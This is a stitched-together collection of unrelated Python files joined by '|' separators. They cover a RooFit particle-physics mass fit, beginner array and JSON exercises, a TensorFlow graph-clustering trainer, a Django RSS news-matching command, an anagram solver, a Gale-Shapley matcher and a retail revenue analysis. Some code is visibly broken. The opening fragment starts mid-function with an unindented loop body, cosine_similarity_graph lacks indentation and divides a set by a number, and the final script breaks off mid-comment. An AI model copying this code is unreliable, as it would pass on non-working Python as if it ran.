drawPdfComponents(fitFunction, frame, ROOT.kAzure, RooFit.NormRange("full"), RooFit.Range("full"), isData = True)
# fitFunction.paramOn(frame, RooFit.Layout(0.62,0.86,0.89))
parList = RooArgSet (nsig, mean_rt, sigma_rt, alpha_rt1, alpha_rt2, n_rt1, n_rt2, mean_wt, sigma_wt)
# parList.add(alphawt1)
# parList.add(alphawt2)
# parList.add(nwt1)
# parList.add(nwt2)
parList.add(frt)
fitFunction.paramOn(frame, RooFit.Parameters(parList), RooFit.Layout(0.62,0.86,0.89))
frame.Draw()
niceFrame(frame, '')
frame. addObject(_writeFitStatus(r))
c1 = ROOT.TCanvas()
upperPad = ROOT.TPad('upperPad' , 'upperPad' , 0., 0.35 , 1., 1. )
lowerPad = ROOT.TPad('lowerPad' , 'lowerPad' , 0., 0.0 , 1., 0.345 )
upperPad.SetBottomMargin(0.012)
lowerPad.SetTopMargin(0)
lowerPad.SetBottomMargin(0.2)
upperPad.Draw(); lowerPad.Draw()
upperPad.cd()
frame.Draw()
if not args.year=='test': writeCMS(frame, args.year, [ q2binning[ibin], q2binning[ibin+1] ], 0)
frame.Draw()
## add plot of pulls
lowerPad.cd()
hpull = frame.pullHist("h_fulldata", pdfstring)
frame2 = tagged_mass.frame(RooFit.Range("full"), RooFit.Title(''))
frame2.addPlotable(hpull,"P")
niceFrameLowerPad(frame2, 'pull')
frame2.Draw()
line = ROOT.TLine(5.0,1,5.6,1)
line.SetLineColor(ROOT.kGreen+3)
line.Draw()
for ilog in [True,False]:
upperPad.SetLogy(ilog)
c1.SaveAs('fit_results_mass/save_fit_data_%s_%s_LMNR_Update%s_newSigmaFRT_pars_Jpsi.pdf'%(ibin, args.year, '_logScale'*ilog))
out_f.cd()
r.Write('results_data_%s'%(ibin))
params = fitFunction.getParameters(RooArgSet(tagged_mass))
out_w.saveSnapshot("reference_fit_data_%s"%(ibin),params,ROOT.kTRUE)
getattr(out_w, 'import')(fitFunction)
# getattr(out_w, 'import')(signalFunction)
# getattr(out_w, 'import')(bkg_pol)
# Load the data ntuple for the requested year ('test' -> small 100k file).
tData = ROOT.TChain('ntuple')
if args.year == 'test':
    tData.Add('/gwteray/users/fiorendi/final_ntuples_p5prime_allyears/2016Data_100k.root')
else:
    tData.Add('/gwteray/users/fiorendi/final_ntuples_p5prime_allyears/%sData_All_finalSelection.root'%args.year)

# Observables read from the tree.
tagged_mass = RooRealVar("tagged_mass" , "#mu^{+}#mu^{-}K#pi mass", 5., 5.6, "GeV")
mumuMass = RooRealVar("mumuMass" , "mumuMass" , 0, 6);
mumuMassE = RooRealVar("mumuMassE" , "mumuMassE", 0, 10000);
tagB0 = RooRealVar("tagB0" , "tagB0" , 0, 2);
tagged_mass.setRange("full", 5.0,5.6) ;
thevars = RooArgSet()
thevars.add(tagged_mass)
thevars.add(mumuMass)
thevars.add(mumuMassE)
thevars.add(tagB0)

fulldata = RooDataSet('fulldata', 'fulldataset', tData, RooArgSet(thevars))

## add to the input tree the combination of the variables, to be used for the cuts on the dimuon mass
# (B0Mass, JPsiMass, PsiPMass presumably come from utils.utils — confirm.)
deltaB0Mfunc = RooFormulaVar("deltaB0M", "deltaB0M", "@0 - @1", RooArgList(tagged_mass,B0Mass) )
deltaJMfunc = RooFormulaVar("deltaJpsiM" , "deltaJpsiM" , "@0 - @1", RooArgList(mumuMass,JPsiMass) )
deltaPMfunc = RooFormulaVar("deltaPsiPM" , "deltaPsiPM" , "@0 - @1", RooArgList(mumuMass,PsiPMass) )
deltaB0M = fulldata.addColumn(deltaB0Mfunc) ;
deltaJpsiM = fulldata.addColumn(deltaJMfunc) ;
deltaPsiPM = fulldata.addColumn(deltaPMfunc) ;
thevars.add(deltaB0M)
thevars.add(deltaJpsiM)
thevars.add(deltaPsiPM)

# Reference MC fit results (per-bin snapshots) used to seed the data model.
if args.year == 'test':
    fname_mcresults = 'fit_results_mass_checkOnMC/results_fits_2016_newSigmaFRT_Jpsi.root'
else:
    fname_mcresults = 'fit_results_mass_checkOnMC/results_fits_%s_newSigmaFRT_Jpsi.root'%args.year

fo = ROOT.TFile()
# NOTE(review): TFile() typically does not raise for a missing file, so this
# except is unlikely to fire and w may end up None — confirm intent.
try:
    fo = ROOT.TFile(fname_mcresults,'open')
except:
    print ('file %s or not found'%(fo))
w = fo.Get('w')

out_f = TFile ("results_data_fits_%s_newSigmaFRT_Jpsi.root"%args.year,"RECREATE")
out_w = ROOT.RooWorkspace("data_w")

# Fit each q2 bin; the two range cuts below restrict this run to the
# J/psi window (8.68-10.09), and rejectPsi skips the resonance bins.
for ibin in range(len(q2binning)-1):
    print 'dimuon selection: ', args.dimusel
    if args.dimusel == 'rejectPsi' and \
       (q2binning[ibin] == 8.68 or q2binning[ibin] == 12.86):
        continue
    if q2binning[ibin] < 8: continue
    if q2binning[ibin] > 10: continue
    fitData(fulldata, ibin, w)

# Summary table: fit status / covariance quality / chi2 per fitted bin.
print ' --------------------------------------------------------------------------------------------------- '
print '--------------------------------------------------------------------------------------------------- '
print 'bin\t\t fit status \t cov. matrix \t\t chi2'
for i,k in enumerate(fitStats.keys()):
    if i%3==0: print '------------------------------------------------------'
    print k , '\t\t', fitStats[k], '\t\t', covStats[k], '\t\t', chi2s[k]

out_f.Close()
# NOTE(review): writeToFile is called after out_f.Close(); it reopens the
# file by name (recreate=False) — confirm this ordering is intended.
out_w.writeToFile(out_f.GetName(), False)
|
from array import *
import Recursion as aa

# Read n integers from the user into a typed integer array.
arr = array('i', [])
n = int(input("Enter no. of array elements: "))
for _ in range(n):
    arr.append(int(input("Enter No.:")))
print(arr)

# Linear search: report the index of the first match, else "not found"
# (the for/else fires only when the loop finishes without a break).
v = int(input("Enter the value you want to search: "))
idx = 0
for k in arr:
    if k == v:
        print("Index=", idx)
        break
    idx += 1
else:
    print("not found")
#print(arr.index(v)) #will show error if v is not found in the arrayV

import numpy as np

arr1 = np.array([[22, 34], [23, 43]])
print(arr1)
print(aa.fact(3))
import json

# 1: parse a nested JSON document and read a deeply nested value.
sampleJson = """{
"company":{
"employee":{
"name":"emma",
"payble":{
"salary":7000,
"bonus":800
}
}
}
}"""
sample = json.loads(sampleJson)
salary = sample['company']['employee']['payble']['salary']
print(salary)

# 2: write a small object to disk, pretty-printed with sorted keys.
with open('file.json', 'w') as f:
    sampleJson = {"id" : 1, "name" : "value2", "age" : 29}
    json.dump(sampleJson, f, indent=2, sort_keys=True)
|
import os
import math
import random
from scipy.sparse import csr_matrix
import scipy.sparse as sp
import networkx as nx
import pandas as pd
import numpy as np
import tensorflow as tf
tf.config.experimental.set_visible_devices([], 'GPU')
from sklearn import metrics
from constants import LR, l, gamma, eta, beta, DATASET_NAME, DROPOUT, epochs, CONV1_OUT_SIZE
from utils import load_data
from metrics import clustering_metrics
from model import MyModel
from losses import total_loss
def convert_sparse_matrix_to_sparse_tensor(sparse_mx):
    """Convert a scipy sparse matrix into an equivalent float32 tf.SparseTensor."""
    coo = sparse_mx if sp.isspmatrix_coo(sparse_mx) else sparse_mx.tocoo()
    # (row, col) pairs of the stored entries, one row per non-zero value.
    idx = np.vstack((coo.row, coo.col)).transpose()
    tensor = tf.SparseTensor(indices=idx, values=coo.data, dense_shape=coo.shape)
    return tf.cast(tensor, dtype=tf.float32)
# features is the sparse matrix containing the features
# adj_train is the sparse adjacency matrix
# adj_train_norm = D^{-1/2}(A+I)D^{-1/2}
# train_edges, train_false_edges are edges that are not present in the adj_matrix
# clustering_labels -> labels of the nodes
# optimizer: the optimizer to apply
# F is the diagonal matrix s.t. F_ii = sum_j S_ij
# S = lambda*normalized(Stopo) + (1-lambda)normalized(S att)
# gamma : defines how to balance att loss and topo loss
# eta defines the importance of the regularization loss
# Y: square matrix st y_ij = beta* (di dj/ 2e) + (1-beta)*(cos_sim(feat_i, feat_j)/ sum_k cos_sim(feat_i, feat_k))
# D is the diagonal matrix s.t. d_ii = deg(i) in (A+I)
# K is the number of clusters
def train(features, adj_train, adj_train_norm, train_edges, train_false_edges, clustering_labels , optimizer, F, S, gamma, eta, Y, D, number_of_features,K):
    """Train MyModel for `epochs` iterations.

    Tracks reconstruction accuracy (topology and attributes) per epoch and
    the best clustering accuracy obtained from the embedding Z and from the
    decoded attributes X2.

    features: sparse feature matrix; adj_train: sparse adjacency (train split);
    adj_train_norm: D^{-1/2}(A+I)D^{-1/2}; clustering_labels: ground-truth
    node labels; F, S, Y, D: matrices described in the comments above;
    K: number of clusters.
    """
    print("training")
    max_acc_x = 0  # best clustering accuracy seen from X2
    max_acc_z = 0  # best clustering accuracy seen from Z
    # convert matrices to tensors once, outside the training loop
    adj_train_norm_tensor = convert_sparse_matrix_to_sparse_tensor(adj_train_norm)
    Y_tensor = tf.convert_to_tensor(Y, dtype="float32")
    D_tensor = tf.convert_to_tensor(D, dtype="float32")
    F_tensor = tf.convert_to_tensor(F, dtype="float32")
    S_tensor = tf.convert_to_tensor(S, dtype="float32")
    feature_tensor = convert_sparse_matrix_to_sparse_tensor(features)
    # define the model
    model = MyModel(Y_tensor, K, D_tensor, adj_train_norm_tensor, number_of_features)
    for i in range(epochs):
        with tf.GradientTape() as tape:
            pred = model(feature_tensor)
            # if you want to train over the non known edges use this
            """ train_edges_p_pred = [pred[0][x[0]*adj_train.shape[0]+x[1]] for x in train_edges]
            train_edges_n_pred = [pred[0][x[0]*adj_train.shape[0] +x[1]] for x in train_false_edges]
            train_edges_p_l = [1]*len(train_edges_p_pred)
            train_edges_n_l = [0]*len(train_edges_n_pred)
            pred[0] = train_edges_p_pred + train_edges_n_pred
            y_actual = [train_edges_p_l+train_edges_n_l, features.toarray().flatten()]
            """
            # ground truth: flattened adjacency and the raw attribute matrix
            y_actual = [adj_train.toarray().flatten(), features.toarray()]
            # embedding of the nodes and decoded attributes
            Z = model.getZ()
            Z_np = model.getZ().numpy()
            X2 = model.getX2()
            X2_np = model.getX2().numpy()
            # calculate the loss
            loss = total_loss(y_actual, pred, F_tensor, S_tensor, Z, gamma, eta)
        # get the gradients and update the model weights
        grad = tape.gradient(loss, model.trainable_variables)
        optimizer.apply_gradients(zip(grad, model.trainable_variables))
        print("#"*30)
        print("epoch:{}, train loss: {}".format(i, loss))
        # measure accuracy on the train edges
        top_acc_function = tf.keras.metrics.BinaryAccuracy()
        top_acc_function.update_state(y_actual[0], pred[0])
        top_train_accuracy = top_acc_function.result().numpy()
        # measure the accuracy on the attributes
        att_acc_function = tf.keras.metrics.BinaryAccuracy()
        att_acc_function.update_state(y_actual[1].flatten(), tf.reshape(pred[1], [-1]))
        att_train_accuracy = att_acc_function.result().numpy()
        print("train top acc: {}".format(top_train_accuracy))
        print("train att acc: {}".format(att_train_accuracy))
        # cluster assignment = argmax over the embedding / decoded attributes
        pred_labels_z = Z_np.argmax(1)
        pred_labels_x = X2_np.argmax(1)
        # BUG FIX: these two calls previously read the module-level global
        # `labels` instead of the `clustering_labels` parameter, silently
        # coupling the function to the __main__ block.
        cm = clustering_metrics(clustering_labels, pred_labels_z)
        res = cm.clusteringAcc()
        print("acc_z:{}, f1_z:{}".format(res[0], res[1]))
        if res[0] > max_acc_z:
            max_acc_z = res[0]
        cm = clustering_metrics(clustering_labels, pred_labels_x)
        res = cm.clusteringAcc()
        print("acc_x:{}, f1_x:{}".format(res[0], res[1]))
        if res[0] > max_acc_x:
            max_acc_x = res[0]
    print("max_acc_z:{}".format(max_acc_z))
    print("max_acc_x:{}".format(max_acc_x))
def compute_adj_norm(adj):
    """Return the symmetrically normalised adjacency D^{-1/2}(A+I)D^{-1/2}."""
    adj_self_loops = adj + sp.eye(adj.shape[0])
    # row sums of (A+I) are the self-loop-augmented degrees
    degrees = np.sum(adj_self_loops, axis=1)
    inv_sqrt_degree = sp.diags(np.asarray(np.power(degrees, -0.5)).reshape(-1))
    return inv_sqrt_degree.dot(adj_self_loops).dot(inv_sqrt_degree)
def sparse_to_tuple(sparse_mx):
    """Decompose a sparse matrix into (non-zero coords, values, shape)."""
    coo = sparse_mx if sp.isspmatrix_coo(sparse_mx) else sparse_mx.tocoo()
    coords = np.vstack((coo.row, coo.col)).transpose()
    return coords, coo.data, coo.shape
# sample non-edges uniformly at random from the matrix
def get_false_edges(adj, n):
    """Return n random upper-triangular pairs [u, v] that are NOT edges."""
    print("getting false edges")
    non_edges = []
    upper = adj.shape[0] - 1
    while len(non_edges) < n:
        u = random.randint(0, upper)
        v = random.randint(0, upper)
        # keep only strictly-upper pairs that are absent from adj
        if u < v and adj[u, v] == 0:
            non_edges.append([u, v])
    return non_edges
# get_test_edges returns:
# adj_train: triu form of the matrix with the train and test edges removed
# edges -> partition of edges to be used in train and test
def get_test_edges(adj, test_size=0, train_size=0):
    """Split the positive edges of adj into test/train/remaining sets and
    sample an equal number of false (non-)edges.

    Returns (adj_train, train_edges, train_false_edges, test_edges,
    test_false_edges); adj_train contains only the remaining edges (triu).
    """
    print("getting test edges")
    all_edges, _, _ = sparse_to_tuple(sp.triu(adj))
    # sizes are fractions of the total positive edge count
    num_train = int(train_size * all_edges.shape[0])
    num_test = int(test_size * all_edges.shape[0])
    # shuffle, then carve out test / train / remaining partitions
    np.random.shuffle(all_edges)
    test_edges = all_edges[:num_test]
    train_edges = all_edges[num_test:num_test + num_train]
    res_edges = all_edges[num_test + num_train:]
    # sample one false edge per held-out positive edge
    false_edges = get_false_edges(adj, test_edges.shape[0] + train_edges.shape[0])
    test_false_edges = false_edges[:test_edges.shape[0]]
    train_false_edges = false_edges[test_edges.shape[0]:]
    print("got false edges")
    # rebuild a sparse matrix from the remaining edges only
    adj_train = sp.csr_matrix(
        (np.ones(res_edges.shape[0]), (res_edges[:, 0], res_edges[:, 1])),
        shape=adj.shape)
    return adj_train, train_edges, np.array(train_false_edges), test_edges, np.array(test_false_edges)
def cosine_similarity_graph(a,b):
# the values are or 0 or 1
den = math.sqrt(len(a)) * math.sqrt(len(b))
num = set(a.keys()).intersection(set(b.keys()))
return num / den
def cosine_similarity(a, b):
    """Cosine similarity of two binary numpy vectors (entries are 0 or 1).

    For 0/1 vectors the L2 norm equals sqrt(number of ones), hence the sums.
    """
    norm_product = math.sqrt(a.sum()) * math.sqrt(b.sum())
    if norm_product == 0:
        return 0
    return np.dot(a, b) / norm_product
# get the Stopo needed to calculate S
# Stopo: s_ij = cos_sim(neigh_i, neigh_j)
def get_S_topo(adj):
    """Pairwise cosine similarity between adjacency rows, cached on disk."""
    cache_path = '{}_stopo.csv'.format(DATASET_NAME)
    if os.path.exists(cache_path):
        return np.loadtxt(cache_path, delimiter=',')
    print("getting S topo")
    s_topo = np.zeros(adj.shape)
    for i in range(adj.shape[0]):
        row_i = adj.getrow(i).toarray()[0]
        # symmetric, so only the upper triangle is computed
        for j in range(i, adj.shape[0]):
            sim = cosine_similarity(row_i, adj.getrow(j).toarray()[0])
            s_topo[i][j] = sim
            s_topo[j][i] = sim
    np.savetxt(cache_path, s_topo, delimiter=',')
    return s_topo
# get the Satt needed to calculate S
# Satt: s_ij = cos_sim(att_i, att_j)
def get_S_att(features_sparse):
    """Pairwise cosine similarity between attribute rows, cached on disk."""
    cache_path = '{}_satt.csv'.format(DATASET_NAME)
    if os.path.exists(cache_path):
        return np.loadtxt(cache_path, delimiter=',')
    print("getting S att")
    n = features_sparse.shape[0]
    s_att = np.zeros((n, n))
    for i in range(n):
        row_i = features_sparse.getrow(i).toarray()[0]
        # symmetric, so only the upper triangle is computed
        for j in range(i, n):
            sim = cosine_similarity(row_i, features_sparse.getrow(j).toarray()[0])
            s_att[i][j] = sim
            s_att[j][i] = sim
    np.savetxt(cache_path, s_att, delimiter=',')
    return s_att
def min_max_normalizer(m):
    """Linearly rescale m so its values span [0, 1]."""
    print("normalizing")
    lo, hi = m.min(), m.max()
    return (m - lo) / (hi - lo)
# lambda*normalized(Stopo) + (1-lambda)*normalized(Satt)
def getS(adj_train, features, l):
    """Blend of normalised topological and attribute similarity, cached on disk."""
    cache_path = '{}_s.csv'.format(DATASET_NAME)
    if os.path.exists(cache_path):
        return np.loadtxt(cache_path, delimiter=',')
    print("getting S")
    s_topo = min_max_normalizer(get_S_topo(adj_train))
    print("got S topo")
    s_att = min_max_normalizer(get_S_att(features))
    print("got S att")
    # l weighs topology against attributes
    S = l * s_topo + (1 - l) * s_att
    np.savetxt(cache_path, S, delimiter=',')
    return S
# the diagonal matrix s.t. f_ii = sum_j S_ij
def getF(S):
    """Diagonal matrix whose entries are the row sums of S."""
    return np.diag([row.sum() for row in S])
# degree matrix of (A+I)
def getD(adj_train):
    """Diagonal degree matrix: d_ii = deg(i) + 1 (the +1 accounts for the
    self-loop added by A+I)."""
    return np.diag([row.sum() + 1 for row in adj_train.toarray()])
# Y: square matrix st y_ij = beta* (di dj/ 2e) + (1-beta)*(cos_sim(feat_i, feat_j)/ sum_k cos_sim(feat_i, feat_k))
def getY(adj_train, beta, features_sparse):
    """Build (and disk-cache) the Y matrix blending degree products with
    normalised attribute similarity.

    NOTE(review): eps_ij subtracts a_ij (modularity-style B = didj/2e - A),
    while the comment above omits the -a_ij term — confirm which is intended.
    """
    cache_path = '{}_Y.csv'.format(DATASET_NAME)
    if os.path.exists(cache_path):
        return np.loadtxt(cache_path, delimiter=',')
    G = nx.Graph(sp.triu(adj_train))
    e = G.number_of_edges()
    S_att = get_S_att(features_sparse)
    n = adj_train.shape[0]
    Y = np.zeros((n, n))
    for i in range(n):
        di = len(G[i])
        sum_z_i = S_att[i].sum()
        for j in range(n):
            dj = len(G[j])
            aij = 1 if G.has_edge(i, j) else 0
            eps_ij = di * dj / (2 * e) - aij
            Y[i][j] = beta * eps_ij + (1 - beta) * S_att[i][j] / sum_z_i
    np.savetxt(cache_path, Y, delimiter=',')
    return Y
if __name__ == "__main__":
    # define the optimizer
    optimizer = tf.keras.optimizers.Adam(learning_rate=LR)
    # load data; load_data returns (adjacency, features, labelled nodes,
    # cluster count) — see the unpacking below
    data = load_data(DATASET_NAME)
    complete_adj = data[0]
    features = data[1]
    # data[2] presumably pairs (node, label); keep only the labels
    labels = [x[1] for x in data[2]]
    n_clusters = data[3]
    # split edges into train/test plus sampled false edges
    adj_train_triu, train_edges, train_false_edges, test_edges, test_false_edges = get_test_edges(complete_adj)
    print("got adj_train")
    # the adj returned by get_test_edges is only triu, we need the complete one
    adj_train = adj_train_triu + adj_train_triu.T
    # normalize the adj: D^{-1/2}(A+I)D^{-1/2}
    adj_train_norm = compute_adj_norm(adj_train)
    print("normalized the adj matrix")
    S = getS(adj_train, features, l)
    print("got S")
    F = getF(S)
    print("got F")
    Y = getY(adj_train, beta, features)
    print("got Y")
    # this method needs to have the complete adj_train (not only the triu)
    D = getD(adj_train)
    print("got D")
    number_of_features = features.shape[1]
    train(features, adj_train, adj_train_norm, train_edges, train_false_edges, labels, optimizer, F, S, gamma, eta, Y, D, number_of_features, K=n_clusters)
|
import feedparser
import re
import dateutil.parser
from django.core.management.base import BaseCommand, CommandError
from django.conf import settings
from news.models import News
class Command(BaseCommand):
    """Cross-reference Google's daily trending searches with CNN US headlines
    and persist every match as a News row."""

    # Characters stripped from titles before comparison.
    # BUG FIX: the original pattern '!@#$,.' was a literal character
    # *sequence* (with '$' and '.' keeping their regex meanings), so it
    # matched essentially nothing; a character class is what was intended.
    _PUNCT_RE = r'[!@#$,.]'

    def handle(self, *args, **options):
        google_trends_rss = feedparser.parse("https://trends.google.com/trends/trendingsearches/daily/rss?geo=US")
        cnn_news_rss = feedparser.parse("http://rss.cnn.com/rss/edition_us.rss")
        for trend in google_trends_rss['entries']:
            trend_clean = re.sub(self._PUNCT_RE, '', trend['title'].lower())
            for news in cnn_news_rss['entries']:
                news_clean = re.sub(self._PUNCT_RE, '', news['title'].lower())
                # a headline matches when any word of the trend appears in it
                for word in trend_clean.split(' '):
                    if word in news_clean:
                        try:
                            n_pub_date = dateutil.parser.parse(news.published)
                        except AttributeError:
                            # some feed entries carry no published date
                            n_pub_date = None
                        # get_or_create keeps repeated matches idempotent
                        n, created = News.objects.get_or_create(
                            title=news['title'],
                            pub_date=n_pub_date,
                            link=news['link'],
                            trend=trend['title']
                        )
        return 'News are renewed'
class Solution:
    # @param strs, a list of strings
    # @return a list of strings
    def anagrams(self, strs):
        """Return every string that shares its sorted-character signature with
        at least one other string, in order of first appearance.

        BUG FIX: the original marked "first occurrence already emitted" by
        storing the literal string ',' in the dict, which broke when an input
        string was itself ','. A separate `emitted` set removes the sentinel.
        """
        first_seen = {}   # signature -> first string carrying that signature
        emitted = set()   # signatures whose first string is already in result
        result = []
        for s in strs:
            signature = ''.join(sorted(s))
            if signature not in first_seen:
                first_seen[signature] = s
            else:
                # second or later occurrence: flush the first one exactly once
                if signature not in emitted:
                    result.append(first_seen[signature])
                    emitted.add(signature)
                result.append(s)
        return result
if __name__ == '__main__':
    # Smoke test for Solution.anagrams.
    # BUG FIX: the Python 2 print statement was a SyntaxError on Python 3;
    # the unused `import pdb` is removed.
    strs = ['xian', 'naxi', 'hello', 'world', 'dlrowd', 'orwld']
    res = Solution().anagrams(strs)
    print("res:", res)
|
import argparse
import copy
from typing import Final
import pandas as pd
import yaml
from tabulate import tabulate
# CLI: -s <scenario> selects which scenario from config.yaml to run.
parser = argparse.ArgumentParser(description='Implementation of the Gale-Shapley algorithm')
parser.add_argument('-s', action='store', dest='scenario', help='The scenario to be ran as specified in '
                                                                'config.yaml')
def print_matching(pairs):
    """Pretty-print a matching as a table with one column per hospital.

    pairs maps resident -> (hospital_name, hospital_values).
    """
    matched_hospitals = {hospital for hospital, _ in pairs.values()}
    columns = {hospital: [resident for resident, match in pairs.items() if match[0] == hospital]
               for hospital in matched_hospitals}
    table = pd.DataFrame.from_dict(columns, orient='index').T.fillna("-")
    print(tabulate(table, headers='keys', tablefmt='psql'))
class GaleShapley:
    """Hospital/resident matching via the Gale-Shapley (deferred acceptance)
    algorithm. Scenarios are read once from config.yaml at class definition.
    """

    # BUG FIX: the config file handle was previously opened inline and never
    # closed; a with-block releases it deterministically.
    with open('config.yaml') as _config_file:
        PARAMETERS: Final = yaml.load(_config_file, Loader=yaml.FullLoader)
    del _config_file  # don't keep the closed handle as a class attribute

    def __init__(self, scenario):
        self._parameters = GaleShapley.PARAMETERS[scenario]
        self._hospitals = self._parameters['hospitals']
        self._residents = self._parameters['residents']
        # rank lookup: _rankings[resident][hospital] -> position (lower = preferred)
        self._rankings = {name: {k: v for v, k in enumerate(preferences)} for name, preferences in
                          self._residents.items()}

    def __call__(self, *args, **kwargs):
        # BUG FIX: previously called self.apply(), a method that does not
        # exist anywhere in the class (guaranteed AttributeError).
        return self.find_matching()

    def find_matching(self):
        """Run deferred acceptance until every hospital is full or has
        exhausted its preference list.

        @return: dict mapping resident -> (hospital_name, hospital_values)
        """
        pairs = {}
        # deep copy: the algorithm consumes preference lists destructively
        hospitals_remaining = copy.deepcopy(self._hospitals)
        while hospitals_remaining:
            hospital_name, values = next(iter(hospitals_remaining.items()))
            preferences = values['preferences']
            if preferences:
                resident = preferences.pop(0)
                # if resident has not been seen yet
                if resident not in pairs:
                    pairs[resident] = hospital_name, values
                    values['open_positions'] -= 1
                    if values['open_positions'] == 0:
                        hospitals_remaining.pop(hospital_name)
                # else check to see if the new choice is better
                else:
                    previous_name, previous_values = pairs[resident]
                    if self._rankings[resident][hospital_name] < self._rankings[resident][previous_name]:
                        pairs[resident] = hospital_name, values
                        values['open_positions'] -= 1
                        # the jilted hospital regains a seat; if it was full
                        # it re-enters the proposing pool
                        if previous_values['open_positions'] == 0:
                            hospitals_remaining[previous_name] = previous_values
                        if values['open_positions'] == 0:
                            hospitals_remaining.pop(hospital_name)
                        previous_values['open_positions'] += 1
            else:
                # BUG FIX: a hospital with an exhausted preference list but
                # open seats previously stayed in the pool forever (infinite
                # loop); drop it so the algorithm terminates.
                hospitals_remaining.pop(hospital_name)
        return pairs
if __name__ == '__main__':
    # parse -s <scenario> and print the resulting matching as a table
    args = parser.parse_args()
    print_matching(GaleShapley(args.scenario).find_matching())
|
# Monthly Revenue
# import libraries
# from __future__ import division
from datetime import datetime, timedelta
import pandas as pd
# matplotlib inline
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
import chart_studio as py
import plotly.offline as pyoff
import plotly.graph_objs as go
# initiate visualization library for jupyter notebook
# pyoff.init_notebook_mode()
# Load the Online Retail transactions dataset.
tx_data = pd.read_csv('OnlineRetail.csv', encoding = 'unicode_escape')
tx_data.head(10)
# Revenue = Active Customer Count * Order Count * Average Revenue per Order
# converting the type of Invoice Date Field from string to datetime.
tx_data['InvoiceDate'] = pd.to_datetime(tx_data['InvoiceDate'])
# creating YearMonth field for the ease of reporting and visualization,
# e.g. 2011-03 -> 201103
tx_data['InvoiceYearMonth'] = tx_data['InvoiceDate'].map(lambda date: 100*date.year + date.month)
# calculate Revenue for each row and create a new dataframe with YearMonth - Revenue columns
tx_data['Revenue'] = tx_data['UnitPrice'] * tx_data['Quantity']
tx_revenue = tx_data.groupby(['InvoiceYearMonth'])['Revenue'].sum().reset_index()
print(tx_revenue)
# visualization
# X and Y axis inputs for the Plotly graph; Scatter renders a line graph.
plot_data = [
    go.Scatter(
        x=tx_revenue['InvoiceYearMonth'],
        y=tx_revenue['Revenue'],
    )
]
plot_layout = go.Layout(
    xaxis={"type": "category"},
    title='Monthly Revenue'  # BUG FIX: chart title was misspelled 'Montly Revenue'
)
fig = go.Figure(data=plot_data, layout=plot_layout)
pyoff.iplot(fig)
# Monthly Revenue Growth Rate
# using pct_change() to get month-over-month percentage change of revenue
tx_revenue['MonthlyGrowth'] = tx_revenue['Revenue'].pct_change()
# showing first 5 rows
tx_revenue.head()
# visualization - line graph (December 2011 is partial, hence the < 201112 filter)
plot_data = [
    go.Scatter(
        x=tx_revenue.query("InvoiceYearMonth < 201112")['InvoiceYearMonth'],
        y=tx_revenue.query("InvoiceYearMonth < 201112")['MonthlyGrowth'],
    )
]
plot_layout = go.Layout(
    xaxis={"type": "category"},
    title='Monthly Growth Rate'  # BUG FIX: chart title was misspelled 'Montly Growth Rate'
)
fig = go.Figure(data=plot_data, layout=plot_layout)
pyoff.iplot(fig)
# Monthly Active Customers and its bar plot
# creating a new dataframe with UK customers only
tx_uk = tx_data.query("Country=='United Kingdom'").reset_index(drop=True)
# creating monthly active customers dataframe by counting unique Customer IDs
tx_monthly_active = tx_uk.groupby('InvoiceYearMonth')['CustomerID'].nunique().reset_index()
# print the dataframe (bare expression: only renders in a notebook)
tx_monthly_active
# plotting the output
plot_data = [
    go.Bar(
        x=tx_monthly_active['InvoiceYearMonth'],
        y=tx_monthly_active['CustomerID'],
    )
]
plot_layout = go.Layout(
    xaxis={"type": "category"},
    title='Monthly Active Customers'
)
fig = go.Figure(data=plot_data, layout=plot_layout)
pyoff.iplot(fig)
# Monthly Order Count and its bar plot
# create a new dataframe for no. of order by using quantity field
tx_monthly_sales = tx_uk.groupby('InvoiceYearMonth')['Quantity'].sum().reset_index()
# print the dataframe (bare expression: only renders in a notebook)
tx_monthly_sales
# plot
plot_data = [
    go.Bar(
        x=tx_monthly_sales['InvoiceYearMonth'],
        y=tx_monthly_sales['Quantity'],
    )
]
plot_layout = go.Layout(
    xaxis={"type": "category"},
    title='Monthly Total # of Order'
)
fig = go.Figure(data=plot_data, layout=plot_layout)
pyoff.iplot(fig)
# Monthly Average Revenue per Order and its bar plot
# create a new dataframe for average revenue by taking the mean of it
tx_monthly_order_avg = tx_uk.groupby('InvoiceYearMonth')['Revenue'].mean().reset_index()
# print the dataframe (bare expression: only renders in a notebook)
tx_monthly_order_avg
# plot the bar chart
plot_data = [
    go.Bar(
        x=tx_monthly_order_avg['InvoiceYearMonth'],
        y=tx_monthly_order_avg['Revenue'],
    )
]
plot_layout = go.Layout(
    xaxis={"type": "category"},
    title='Monthly Order Average'
)
fig = go.Figure(data=plot_data, layout=plot_layout)
pyoff.iplot(fig)
# New Customer Ratio (We will be using .min() function to find our first purchase date for each customer and define new customers based on that.)
# create a dataframe containing CustomerID and first purchase date
tx_min_purchase = tx_uk.groupby('CustomerID').InvoiceDate.min().reset_index()
tx_min_purchase.columns = ['CustomerID','MinPurchaseDate']
tx_min_purchase['MinPurchaseYearMonth'] = tx_min_purchase['MinPurchaseDate'].map(lambda date: 100*date.year + date.month)
# merge first purchase date column to our main dataframe (tx_uk)
tx_uk = pd.merge(tx_uk, tx_min_purchase, on='CustomerID')
tx_uk.head()
# create a column called User Type and assign Existing
# if User's First Purchase Year Month is before the selected Invoice Year Month
tx_uk['UserType'] = 'New'
tx_uk.loc[tx_uk['InvoiceYearMonth']>tx_uk['MinPurchaseYearMonth'],'UserType'] = 'Existing'
# calculate the Revenue per month for each user type
tx_user_type_revenue = tx_uk.groupby(['InvoiceYearMonth','UserType'])['Revenue'].sum().reset_index()
# filtering the dates (first and last months are partial) and plot the result
tx_user_type_revenue = tx_user_type_revenue.query("InvoiceYearMonth != 201012 and InvoiceYearMonth != 201112")
plot_data = [
    go.Scatter(
        x=tx_user_type_revenue.query("UserType == 'Existing'")['InvoiceYearMonth'],
        y=tx_user_type_revenue.query("UserType == 'Existing'")['Revenue'],
        name = 'Existing'
    ),
    go.Scatter(
        x=tx_user_type_revenue.query("UserType == 'New'")['InvoiceYearMonth'],
        y=tx_user_type_revenue.query("UserType == 'New'")['Revenue'],
        name = 'New'
    )
]
plot_layout = go.Layout(
    xaxis={"type": "category"},
    title='New vs Existing'
)
fig = go.Figure(data=plot_data, layout=plot_layout)
pyoff.iplot(fig)
# looking at the New Customer Ratio
# create a dataframe that shows new user ratio - we also need to drop NA values (first month new user ratio is 0)
